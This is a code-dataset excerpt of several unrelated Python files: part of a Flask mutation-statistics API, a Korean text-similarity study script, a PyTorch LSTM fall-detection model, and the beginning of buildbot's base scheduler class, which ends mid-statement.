protein)\n \n if(muts==\"\"):\n resp['error']=\"There is no mutations in the input sequence.\"\n else:\n with open(directory+'data/mutationCount.json', 'r') as fp:\n dat = json.load(fp)\n \n nodb=[]\n indb=[]\n counts={}\n for m in muts.split(';'):\n if( protein+\"_\"+m.replace(\"-\", \"del\") in dat.keys() ):\n counts[m] = dat[protein+\"_\"+m.replace(\"-\", \"del\")]\n #indb.append(m+\" - \"+str(counts[m]))\n indb.append(m)\n else:\n counts[m] = 0\n nodb.append(m)\n \n if(counts=={}):\n resp[\"error\"]=\"Mutations were not found in database\"\n else:\n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\", \"labels\": [], \"counts\": []}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n sorted_={}\n _list = reversed( sorted( counts.items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n resp[\"labels\"].append(l)\n resp[\"counts\"].append(sorted_[l])\n \n for l in counts.keys():\n f.write(\"%s\\t%i\\n\" %( l, counts[l] ) )\n f.close()\n \n resp[\"mutations_indb\"]=indb\n resp[\"mutations_nodb\"]=nodb\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/domain_counts_by_protein', methods=['GET'])\ndef section6_domain_counts_by_protein(): # chart pie\n fake = Factory.create()\n \n resp={\"error\": \"Invalid input\"}\n try:\n with open(directory+'data/info_domains.json', 'r') as fp:\n dat = json.load(fp)\n \n df=pd.read_csv(directory+\"data/report_domains.tsv\", sep=\"\\t\")\n df = df[ df[\"y\"]>50000 ]\n labels=df['label'].unique()\n \n colors=[]\n while (len(colors) != len(labels)):\n color=str(fake.hex_color())\n if(not color in colors):\n colors.append(color)\n \n c=0\n descs={}\n bars = []\n for label, label_df in df.groupby('label'):\n xlab=[]\n for n in label_df.x:\n domain=n.split(\"-\")[1]\n xlab.append(domain)\n descs[domain] = \"

    \"+domain+\" (\"+dat[domain]['prosite']+\") - \"+dat[domain]['description']+\"

    \"\n bars.append( { \"x\": list(xlab), \"y\": list(label_df.y), \"name\": label, \"marker\": { 'color': colors[c] }, \"type\": \"bar\" } )\n c+=1\n \n resp[\"data\"]=bars\n \n resp[\"error\"]=\"\"\n \n resp[\"info_domain\"]=\"\"\n for k in descs.keys():\n resp[\"info_domain\"]+= descs[k]\n \n except:\n pass\n\n return json.dumps(resp)\n\n\nif __name__ == \"__main__\":\n app.run(host=ip)\n\n\n", "repo_name": "YasCoMa/foca_api", "sub_path": "api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 36460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 76, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 114, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 121, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 125, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 129, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 133, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 137, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 141, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 145, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 149, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 152, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 160, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 212, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 223, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 232, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 296, "usage_type": "call"}, {"api_name": "faker.Factory.create", "line_number": 301, "usage_type": "call"}, {"api_name": "faker.Factory", "line_number": 301, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 308, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 316, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 316, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 317, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 317, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 392, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 402, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 406, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 411, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 475, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 486, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 488, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 488, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 488, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 489, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 489, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 489, "usage_type": "name"}, {"api_name": "Levenshtein.ratio", "line_number": 509, "usage_type": "call"}, {"api_name": "os.system", "line_number": 514, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 517, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 527, "usage_type": "call"}, {"api_name": "os.path", "line_number": 527, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 535, "usage_type": "call"}, {"api_name": "os.path", "line_number": 535, "usage_type": "attribute"}, {"api_name": "auxiliar_functions._get_domain", "line_number": 571, "usage_type": "call"}, {"api_name": "auxiliar_functions._get_muts_in_domains", "line_number": 589, "usage_type": "call"}, {"api_name": "auxiliar_functions._get_muts_in_domains", "line_number": 599, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 627, "usage_type": "call"}, {"api_name": "os.path", "line_number": 627, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 628, "usage_type": "call"}, {"api_name": "shutil.make_archive", "line_number": 651, "usage_type": "call"}, {"api_name": "os.system", "line_number": 654, "usage_type": "call"}, {"api_name": "auxiliar_functions.send_success_email", "line_number": 658, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 662, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 669, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 673, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 676, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 680, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 682, "usage_type": "call"}, {"api_name": "fbprophet.Prophet", "line_number": 685, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 692, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 692, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 693, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 693, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 697, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 709, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 733, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 742, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 749, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 751, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 777, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 786, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 793, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 795, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 821, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 830, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 837, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 839, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 865, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 874, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 881, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 883, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 909, "usage_type": "call"}, {"api_name": "auxiliar_functions._get_mutations", "line_number": 916, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 922, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 939, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 963, "usage_type": "call"}, {"api_name": "faker.Factory.create", "line_number": 967, "usage_type": "call"}, {"api_name": "faker.Factory", "line_number": 967, "usage_type": "name"}, {"api_name": "simplejson.load", "line_number": 972, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 974, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 1007, "usage_type": "call"}]} +{"seq_id": "64526407", "text": "\"\"\"\nn-gram 유사도\nex) 2-gram\n* n을 크게 잡을수록 비교 문장의 토큰과 비교할때 카운트를 놓칠 확률이 커짐\n* n을 작게 잡을수록 카운트 확률은 높아지지만 문맥파악 정확도가 떨어짐\n\"\"\"\n\nfrom konlpy.tag import Komoran\nimport numpy as np\nfrom numpy import dot\nfrom numpy.linalg import norm\n\n\n#\n# # 어절 단위 n-gram\n# def word_ngram(bow, num_gram):\n# text = tuple(bow)\n# ngrams = [text[x:x + num_gram] for x in range(0, len(text))]\n# return tuple(ngrams)\n#\n#\n# # 음절 n-gram 분석\n# def phoneme_ngram(bow, num_gram):\n# sentence = ' '.join(bow)\n# text = tuple(sentence)\n# slen = len(text)\n# ngrams = [text[x:x + num_gram] for x in range(0, slen)]\n# return ngrams\n#\n#\n# # 유사도 계산\n# def similarity(doc1, doc2):\n# cnt = 0\n# for token in doc1:\n# if token in doc2:\n# cnt = cnt + 1\n#\n# return cnt/len(doc1)\n#\n#\n# sentence1 = '6월에 뉴턴은 선생님의 제안으로 트리니티에 입학하였다'\n# sentence2 = '6월에 뉴턴은 선생님의 제안으로 대학교에 입학하였다'\n# sentence3 = '나는 맛잇는 밥을 뉴턴 선생님과 함께 먹었습니다.'\n\n\n\n# komoran = Komoran(userdic='./user_dic.txt') # 사용자 사전 추가\n# bow1 = komoran.nouns(sentence1)\n# bow2 = komoran.nouns(sentence2)\n# bow3 = komoran.nouns(sentence3)\n#\n# doc1 = word_ngram(bow1, 2)\n# doc2 = word_ngram(bow2, 2)\n# doc3 = word_ngram(bow3, 2)\n#\n# print(doc1)\n# print(doc2)\n# print(doc3)\n#\n# r1 = similarity(doc1, doc2)\n# r2 = similarity(doc3, doc1)\n# print(r1)\n# print(r2)\n\"\"\"\n코사인 유사도\n백터간 각도를 이용해 유사성 파악\n코사인 각도를 이용함.\nngram의 경우 동일한 단어가 자주 등장하면 안좋음.\n그러므로 코사인 유사도 자주 사용\n\"\"\"\n# 코사인 유사도 계산\ndef cos_sim(vec1, vec2):\n return dot(vec1, vec2) / (norm(vec1) * norm(vec2))\n\n\n# TDM 만들기\ndef make_term_doc_mat(sentence_bow, word_dics):\n freq_mat = {}\n\n for word in word_dics:\n freq_mat[word] = 0\n\n for word in word_dics:\n if word in sentence_bow:\n freq_mat[word] += 1\n\n return freq_mat\n\n\n# 단어 벡터 만들기\ndef make_vector(tdm):\n vec = []\n for key in tdm:\n vec.append(tdm[key])\n return vec\n\n\n# 문장 정의\nsentence1 = '6월에 뉴턴은 선생님의 제안으로 트리니티에 입학하였다'\nsentence2 = '6월에 뉴턴은 선생님의 제안으로 대학교에 입학하였다'\nsentence3 = '나는 맛잇는 밥을 뉴턴 선생님과 함께 먹었습니다.'\n\n# 헝태소분석기를 이용해 단어 묶음 리스트 생성\nkomoran = Komoran()\nbow1 = komoran.nouns(sentence1)\nbow2 = komoran.nouns(sentence2)\nbow3 = komoran.nouns(sentence3)\n\n# 단어 묶음 리스트를 하나로 합침\nbow = bow1 + bow2 + bow3\nprint(\"bow : \", bow)\n# 단어 묶음에서 중복제거해 단어 사전 구축\nword_dics = []\nfor token in bow:\n if token not in word_dics:\n word_dics.append(token)\n\n\n# 문장 별 단어 문서 행렬 계산\nfreq_list1 = make_term_doc_mat(bow1, word_dics)\nfreq_list2 = make_term_doc_mat(bow2, word_dics)\nfreq_list3 = make_term_doc_mat(bow3, word_dics)\nprint(freq_list1)\nprint(freq_list2)\nprint(freq_list3)\n\n\n# 코사인 유사도 계산\ndoc1 = np.array(make_vector(freq_list1))\ndoc2 = np.array(make_vector(freq_list2))\ndoc3 = np.array(make_vector(freq_list3))\n\nr1 = cos_sim(doc1, doc2)\nr2 = cos_sim(doc3, doc1)\nprint(r1)\nprint(r2)\n\n", "repo_name": "yhk5689/Chatbot_hospital", "sub_path": "Study/processing/Text_simular.py", "file_name": "Text_simular.py", "file_ext": "py", "file_size_in_byte": 3479, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.dot", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 73, "usage_type": "call"}, {"api_name": "konlpy.tag.Komoran", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "40710673712", "text": "import argparse\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.autograd as autograd\nfrom torch import optim\nimport torch.nn.functional as F\n\nfrom data_utils import read_data \n\nclass Net(nn.Module):\n def __init__(self, batch_size, input_size, hidden_size, num_hidden_layer, output_size, bptt):\n super(Net, self).__init__()\n self.batch_size = batch_size\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.num_hidden_layer = num_hidden_layer\n self.output_size = output_size\n self.bptt = bptt\n\n self.lstm = nn.LSTM(input_size, hidden_size, num_hidden_layer)\n self.linear = nn.Linear(hidden_size, output_size)\n self.softmax = nn.Softmax()\n\n\n def forward(self, input, hidden):\n input = input.view(-1, self.batch_size, self.input_size)\n output, hidden = self.lstm(input, hidden)\n output = output.view(-1, self.hidden_size)\n output = self.softmax(self.linear(output))\n\n return output, hidden\n\n\n def init_hidden(self, cuda):\n h = Variable(torch.zeros(self.num_hidden_layer, self.batch_size, self.hidden_size))\n c = Variable(torch.zeros(self.num_hidden_layer, self.batch_size, self.hidden_size))\n if torch.cuda.is_available and cuda: \n h, c = h.cuda(), c.cuda()\n return (h, c)\n\n\n def read_sequence(self, path, num_components):\n datas = read_data(path, num_components) \n sequences = []\n for x_, y_ in datas:\n xs, ys = [], []\n for i in range(x_.shape[0] // self.bptt):\n x = x_[i*self.bptt:(i+1)*self.bptt,:]\n y = y_[i*self.bptt:(i+1)*self.bptt]\n x = torch.from_numpy(x).float()\n y = torch.from_numpy(y).long()\n xs.append(x)\n ys.append(y)\n\n sequences.append((xs, ys))\n return sequences\n\n def split_train_valid(self, sequences):\n train_seq, valid_seq = [], []\n for (idx, seq) in enumerate(sequences):\n if (idx + 1) % 3 == 0:\n valid_seq.append(seq)\n else:\n train_seq.append(seq)\n return train_seq, valid_seq\n\n\ndef train(sequences, net, error, optimizer, cuda, prob, is_training = True):\n losses = 0.0\n cnt = 0\n num_samples, num_correct, num_predicted, num_fall = 0.0, 0.0, 0.0, 0.0\n for (idx, seqs) in enumerate(sequences):\n hidden = net.init_hidden(cuda)\n xs, ys = seqs\n loss = 0.0\n num_x = 0\n for i in range(len(xs)):\n x, y = Variable(xs[i]), Variable(ys[i]).view(-1)\n if cuda: x, y = x.cuda(), y.cuda()\n \n pred_y, hidden = net(x, hidden)\n if np.random.rand(1,1) < prob:\n hidden = net.init_hidden(cuda)\n cnt += 1\n # cross entropy\n loss += error(pred_y, y)\n num_x += len(x)\n \n # accuracy\n _, predicted = torch.max(pred_y.data, 1)\n num_samples += y.size()[0]\n num_correct += (predicted == y.data).sum()\n losses += (loss / num_x)\n if len(sequences) > 0 and is_training:\n loss.backward()\n optimizer.step()\n num_correct = num_correct.item()\n return losses / len(sequences), num_correct / num_samples\n\n\ndef trainEpochs(train_seq, num_epochs, net, error, cuda, prob, learning_rate):\n for i in range(num_epochs):\n optimizer = optim.Adam(net.parameters(), lr = learning_rate)\n \n print (\"epoch {}\".format(i + 1))\n train_loss, _ = train(train_seq, net, error, optimizer, cuda, prob)\n print (\"train set loss is {}\".format(train_loss.data[0]))\n\n\ndef validEpochs(valid_seq, net, error, cuda, prob):\n \n learning_rate = 0.001\n optimizer = optim.Adam(net.parameters(), lr = learning_rate)\n valid_loss, valid_accuracy = train(valid_seq, net, error, optimizer, cuda, prob, False)\n print (\"valid set loss is {}\".format(valid_loss.data[0]))\n print (\"valid set accuracy is {}\".format(valid_accuracy))\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--cuda', action = 'store_true', \n help = 'use cuda')\n parser.add_argument('--path', type = str, default = 'data', \n help = 'location of data')\n parser.add_argument('--label_path', type = str, default = 'data/label.txt', \n help = 'location of label')\n parser.add_argument('--num_epochs', type = int, default = 20,\n help = 'number of epochs')\n parser.add_argument('--batch_size', type = int, default = 1,\n help = 'batch size')\n parser.add_argument('--input_size', type = int, default = 10,\n help = 'input size')\n parser.add_argument('--hidden_size', type = int, default = 100,\n help = 'hidden size')\n parser.add_argument('--num_hidden_layer', type = int, default = 2,\n help = 'num hidden layer')\n parser.add_argument('--output_size', type = int, default = 2,\n help = 'output size')\n parser.add_argument('--bptt', type = int, default = 1,\n help = 'bptt size')\n parser.add_argument('--prob', type = float, default = 0.15,\n help = 'reset probability')\n parser.add_argument('--num_components', type = int, default = 10)\n parser.add_argument('--lr', type = float, default = 0.001)\n parser.add_argument('--is_training', action = 'store_true',\n help = 'is training')\n parser.add_argument('--model_name', type = str , default = 'model/net')\n args = parser.parse_args()\n args.cuda = False\n args.model_name = 'model/net' + str(args.prob)\n # define network\n net = Net(args.batch_size, args.input_size, args.hidden_size, args.num_hidden_layer, args.output_size, args.bptt)\n if torch.cuda.is_available and args.cuda: net = net.cuda()\n\n # cross entropy error\n error = nn.CrossEntropyLoss()\n \n # read data\n folders = ['1', '2', '3', '4', '5', '6']\n sequences = net.read_sequence(args.path, args.num_components)\n train_seq, valid_seq = net.split_train_valid(sequences)\n if args.is_training:\n print (\"Train\")\n trainEpochs(train_seq, args.num_epochs, net, error, args.cuda, args.prob, args.lr)\n torch.save(net, args.model_name)\n else:\n print (\"Valid\")\n net = torch.load(args.model_name)\n #validEpochs(valid_seq, net, error, args.cuda, args.prob)\n validEpochs(sequences, net, error, args.cuda, args.prob)\n \n\n\n", "repo_name": "YiqiJ/Fall-Detection", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 6732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "data_utils.read_data", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 116, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 172, "usage_type": "call"}]} +{"seq_id": "13056058856", "text": "from buildbot import config\nfrom buildbot import interfaces\nfrom buildbot.process.properties import Properties\nfrom buildbot.util import ComparableMixin\nfrom buildbot.util.state import StateMixin\nfrom twisted.application import service\nfrom twisted.internet import defer\nfrom twisted.python import failure\nfrom twisted.python import log\nfrom zope.interface import implements\n\n\nclass BaseScheduler(service.MultiService, ComparableMixin, StateMixin):\n\n \"\"\"\n Base class for all schedulers; this provides the equipment to manage\n reconfigurations and to handle basic scheduler state. It also provides\n utility methods to begin various sorts of builds.\n\n Subclasses should add any configuration-derived attributes to\n C{base.Scheduler.compare_attrs}.\n \"\"\"\n\n implements(interfaces.IScheduler)\n\n DefaultCodebases = {'': {}}\n\n compare_attrs = ('name', 'builderNames', 'properties', 'codebases')\n\n def __init__(self, name, builderNames, properties,\n codebases=DefaultCodebases):\n \"\"\"\n Initialize a Scheduler.\n\n @param name: name of this scheduler (used as a key for state)\n @type name: unicode\n\n @param builderNames: list of builders this scheduler may start\n @type builderNames: list of unicode\n\n @param properties: properties to add to builds triggered by this\n scheduler\n @type properties: dictionary\n\n @param codebases: codebases that are necessary to process the changes\n @type codebases: dict with following struct:\n key: ''\n value: {'repository':'', 'branch':'
    ', 'revision:''}\n\n @param consumeChanges: true if this scheduler wishes to be informed\n about the addition of new changes. Defaults to False. This should\n be passed explicitly from subclasses to indicate their interest in\n consuming changes.\n @type consumeChanges: boolean\n \"\"\"\n service.MultiService.__init__(self)\n self.name = name\n \"name of this scheduler; used to identify replacements on reconfig\"\n\n ok = True\n if not isinstance(builderNames, (list, tuple)):\n ok = False\n else:\n for b in builderNames:\n if not isinstance(b, basestring):\n ok = False\n if not ok:\n config.error(\n \"The builderNames argument to a scheduler must be a list \"\n \"of Builder names.\")\n\n self.builderNames = builderNames\n \"list of builder names to start in each buildset\"\n\n self.properties = Properties()\n \"properties that are contributed to each buildset\"\n self.properties.update(properties, \"Scheduler\")\n self.properties.setProperty(\"scheduler\", name, \"Scheduler\")\n\n self.objectid = None\n\n self.master = None\n\n # Set the codebases that are necessary to process the changes\n # These codebases will always result in a sourcestamp with or without changes\n if codebases is not None:\n if not isinstance(codebases, dict):\n config.error(\"Codebases must be a dict of dicts\")\n for codebase, codebase_attrs in codebases.iteritems():\n if not isinstance(codebase_attrs, dict):\n config.error(\"Codebases must be a dict of dicts\")\n if (codebases != BaseScheduler.DefaultCodebases and\n 'repository' not in codebase_attrs):\n config.error(\"The key 'repository' is mandatory in codebases\")\n else:\n config.error(\"Codebases cannot be None\")\n\n self.codebases = codebases\n\n # internal variables\n self._change_subscription = None\n self._change_consumption_lock = defer.DeferredLock()\n\n # service handling\n\n def startService(self):\n service.MultiService.startService(self)\n\n def findNewSchedulerInstance(self, new_config):\n return new_config.schedulers[self.name] # should exist!\n\n def stopService(self):\n d = defer.maybeDeferred(self._stopConsumingChanges)\n d.addCallback(lambda _: service.MultiService.stopService(self))\n return d\n\n # status queries\n # TODO: these aren't compatible with distributed schedulers\n def listBuilderNames(self):\n \"Returns the list of builder names\"\n return self.builderNames\n\n def getPendingBuildTimes(self):\n \"Returns a list of the next times that builds are scheduled, if known.\"\n return []\n\n # change handling\n\n def startConsumingChanges(self, fileIsImportant=None, change_filter=None,\n onlyImportant=False):\n \"\"\"\n Subclasses should call this method from startService to register to\n receive changes. The BaseScheduler class will take care of filtering\n the changes (using change_filter) and (if fileIsImportant is not None)\n classifying them. See L{gotChange}. Returns a Deferred.\n\n @param fileIsImportant: a callable provided by the user to distinguish\n important and unimportant changes\n @type fileIsImportant: callable\n\n @param change_filter: a filter to determine which changes are even\n considered by this scheduler, or C{None} to consider all changes\n @type change_filter: L{buildbot.changes.filter.ChangeFilter} instance\n\n @param onlyImportant: If True, only important changes, as specified by\n fileIsImportant, will be added to the buildset.\n @type onlyImportant: boolean\n\n \"\"\"\n assert fileIsImportant is None or callable(fileIsImportant)\n\n # register for changes with master\n assert not self._change_subscription\n\n def changeCallback(change):\n # ignore changes delivered while we're not running\n if not self._change_subscription:\n return\n\n if change_filter and not change_filter.filter_change(change):\n return\n if change.codebase not in self.codebases:\n log.msg(format='change contains codebase %(codebase)s that is '\n 'not processed by scheduler %(name)s',\n codebase=change.codebase, name=self.name)\n return\n if fileIsImportant:\n try:\n important = fileIsImportant(change)\n if not important and onlyImportant:\n return\n except:\n log.err(failure.Failure(),\n 'in fileIsImportant check for %s' % change)\n return\n else:\n important = True\n\n # use change_consumption_lock to ensure the service does not stop\n # while this change is being processed\n d = self._change_consumption_lock.run(self.gotChange, change, important)\n d.addErrback(log.err, 'while processing change')\n self._change_subscription = self.master.subscribeToChanges(changeCallback)\n\n return defer.succeed(None)\n\n def _stopConsumingChanges(self):\n # (note: called automatically in stopService)\n\n # acquire the lock change consumption lock to ensure that any change\n # consumption is complete before we are done stopping consumption\n def stop():\n if self._change_subscription:\n self._change_subscription.unsubscribe()\n self._change_subscription = None\n return self._change_consumption_lock.run(stop)\n\n def gotChange(self, change, important):\n \"\"\"\n Called when a change is received; returns a Deferred. If the\n C{fileIsImportant} parameter to C{startConsumingChanges} was C{None},\n then all changes are considered important.\n The C{codebase} of the change has always an entry in the C{codebases}\n dictionary of the scheduler.\n\n @param change: the new change object\n @type change: L{buildbot.changes.changes.Change} instance\n @param important: true if this is an important change, according to\n C{fileIsImportant}.\n @type important: boolean\n @returns: Deferred\n \"\"\"\n raise NotImplementedError\n\n # starting builds\n\n @defer.inlineCallbacks\n def addBuildsetForLatest(self, reason='', external_idstring=None,\n branch=None, repository='', project='',\n builderNames=None, properties=None):\n \"\"\"\n Add a buildset for the 'latest' source in the given branch,\n repository, and project. This will create a relative sourcestamp for\n the buildset.\n\n This method will add any properties provided to the scheduler\n constructor to the buildset, and will call the master's addBuildset\n method with the appropriate parameters.\n\n @param reason: reason for this buildset\n @type reason: unicode string\n @param external_idstring: external identifier for this buildset, or None\n @param branch: branch to build (note that None often has a special meaning)\n @param repository: repository name for sourcestamp\n @param project: project name for sourcestamp\n @param builderNames: builders to name in the buildset (defaults to\n C{self.builderNames})\n @param properties: a properties object containing initial properties for\n the buildset\n @type properties: L{buildbot.process.properties.Properties}\n @returns: (buildset ID, buildrequest IDs) via Deferred\n \"\"\"\n # Define setid for this set of changed repositories\n setid = yield self.master.db.sourcestampsets.addSourceStampSet()\n\n # add a sourcestamp for each codebase\n for codebase, cb_info in self.codebases.iteritems():\n ss_repository = cb_info.get('repository', repository)\n ss_branch = cb_info.get('branch', branch)\n ss_revision = cb_info.get('revision', None)\n yield self.master.db.sourcestamps.addSourceStamp(\n codebase=codebase,\n repository=ss_repository,\n branch=ss_branch,\n revision=ss_revision,\n project=project,\n changeids=set(),\n sourcestampsetid=setid)\n\n bsid, brids = yield self.addBuildsetForSourceStamp(\n setid=setid, reason=reason,\n external_idstring=external_idstring,\n builderNames=builderNames,\n properties=properties)\n\n defer.returnValue((bsid, brids))\n\n @defer.inlineCallbacks\n def addBuildsetForSourceStampDetails(self, reason='', external_idstring=None,\n branch=None, repository='', project='', revision=None,\n builderNames=None, properties=None):\n \"\"\"\n Given details about the source code to build, create a source stamp and\n then add a buildset for it.\n\n @param reason: reason for this buildset\n @type reason: unicode string\n @param external_idstring: external identifier for this buildset, or None\n @param branch: branch to build (note that None often has a special meaning)\n @param repository: repository name for sourcestamp\n @param project: project name for sourcestamp\n @param revision: revision to build - default is latest\n @param builderNames: builders to name in the buildset (defaults to\n C{self.builderNames})\n @param properties: a properties object containing initial properties for\n the buildset\n @type properties: L{buildbot.process.properties.Properties}\n @returns: (buildset ID, buildrequest IDs) via Deferred\n \"\"\"\n # Define setid for this set of changed repositories\n setid = yield 